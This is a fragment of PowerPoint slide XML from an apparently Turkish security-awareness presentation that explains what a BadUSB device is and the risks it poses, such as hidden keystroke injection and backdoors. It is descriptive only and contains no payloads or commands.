              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkileşime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>girdikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sonra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehlikeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gizli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aktarılıp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjekte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gizlice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yürütülebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tespiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleştirilemezse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güvenliğin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehlikeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görmezden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gelme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>durumları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>küçük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çaplı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> DDoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zararlı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kapılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>açacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>uygulamalar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yükleyerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>büyük</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehlikelerle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>karşıya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kalma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>durumu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçekleşecektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="USB Drop Attack in System Hacking - GeeksforGeeks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E1DB7A-C636-484F-A086-86251F359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185" y="4086225"/>
            <a:ext cx="4051579" cy="2230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ow to Build a Bad USB &amp; How to Protect Yourself Against Such Attacks! –  zSecurity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D75EA8A-B14D-4956-963B-128694549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278" y="2034343"/>
            <a:ext cx="2479391" cy="1394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77762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B02CCB9-9182-48BA-9ED8-AEAF5391E8E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>BADUSB nedir?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6299DCC0-D0E2-4EA6-8093-5172BFD2D00B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096063"/>
            <a:ext cx="5512405" cy="4414804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görevi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>görerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarlara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yönelik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>göndermesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sebebiyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>programlanmış</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>klavyeler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>adlandırılmıştır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etkileşime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>girdikten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sonra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tehlikeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gizli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>hedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>cihaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>içine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aktarılıp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>enjekte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gizlice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yürütülebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="BadUSB explained: How rogue USBs threaten your organization | CSO Online">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC280EF-F2F4-4942-ACD3-E55A453DE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166" y="2633133"/>
            <a:ext cx="3753389" cy="25022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9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B101980-88AB-470D-BB10-0248709F126F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
